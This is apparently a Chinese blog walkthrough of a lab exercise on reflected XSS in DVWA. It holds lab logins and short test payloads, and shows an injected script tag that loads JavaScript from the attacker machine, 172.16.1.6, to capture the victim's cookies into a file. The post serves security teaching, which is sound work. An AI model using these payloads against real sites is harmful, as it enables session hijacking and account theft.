web安全应用-XSS跨站脚本初级

任务环境说明:

服务器场景:Windows 7(用户名:test;密码:123456)
服务器场景:Microsoft Windows2003 Server(用户名:administrator;密码:123456)

第一步,打开网络拓扑,点击启动选项,启动实验虚拟机

第二步,使用ifconfig和ipconfig命令分别获取渗透机和靶机的IP地址,使用ping命令进行网络连通性测试,确保主机间网络的连通性;

确认渗透机ip地址172.16.1.6 

 

确认靶机ip地址172.16.1.5 

 

第三步,打开火狐浏览器,在地址栏输入靶机的地址访问网页,使用默认用户名admin密码password登录

 

第四步,在DVWA页面点击“DVWA Security” 选择难易程度为“low”,然后点击“Submit”提交

 

第五步,在导航栏点击“XSS(Reflected)”,能看到一句话,一个文本框以及一个按钮。点击“view source”可以看到本页面的PHP源代码

 

第六步,PHP源代码如下,可以理解成PHP脚本中没有做任何的加固;可以借助<pre>……</pre>进行注入。pre元素可定义预格式化的文本,被包围在 pre 元素中的文本通常会保留空格和换行符

 

第七步,在XSS(Reflected)界面中,右键点击“查看页面源代码”,查看网页源代码

 

第八步,在页面源代码中,能看到XSS(Reflected)界面中含有input。可以尝试在网页的文本框进行注入

 

第九步,在XSS(Reflected)页面文本框中输入“<xss> /: " ' ;”,点击“Submit”提交

 

第十步,再次查看html源代码,发现出现<pre>元素,在pre中间的特殊符号没有被过滤

 

第十一步,在XSS(Reflected)页面文本框中输入注入语句“<script>(/xss/)</script>”,点击“Submit”提交

 

第十二步,弹框成功,说明存在XSS注入点

 

第十三步,尝试使用XSS注入点进行cookie拦截。在渗透机上制作一个简易的js脚本,用来捕捉靶机网页的cookie,代码如下

 

第十四步,再在渗透机上制作一个PHP脚本来接收JS返回的信息,代码如下

 

第十五步,在XSS(Reflected)页面文本框中,输入注入语句“<script src="http://172.16.1.6/test.js"></script>”,点击“Submit”进行提交

 

第十六步,在本地渗透机上,js与PHP文件所在目录生成一个新的文件“filePath”,将filePath文件打开可以看到获取的cookie

 

实验结束,关闭虚拟机。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值